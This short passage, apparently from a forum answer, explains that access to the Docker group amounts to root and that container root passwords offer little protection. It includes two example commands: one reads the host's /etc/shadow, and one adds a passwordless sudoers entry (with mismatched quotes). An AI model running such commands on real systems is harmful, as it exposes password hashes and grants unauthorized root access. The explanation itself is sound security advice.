Your users need root access to their systems; and if they have some non-root method to access Docker, like the docker
group in Ubuntu, it’s one step away from root.
docker run --rm -v /:/host ubuntu:16.04 cat /host/etc/shadow
docker run --rm -v /:/host ubuntu:16.04 sh -c "echo $USER ALL=(ALL) NOPASSWD: ALL >>/host/etc/sudoers'
Also, “debug” mechanisms like docker exec
jump directly into a root shell in the container and ignore any password setup you might happen to have in the container.
As I said above, nothing stops you from RUN echo foo | passwd root
in a Dockerfile (visible in docker history
), or COPY shadow /etc
(still vulnerable to offline attacks) to “set a root password in the container”, but it’s all but impossible to make that an effective security measure.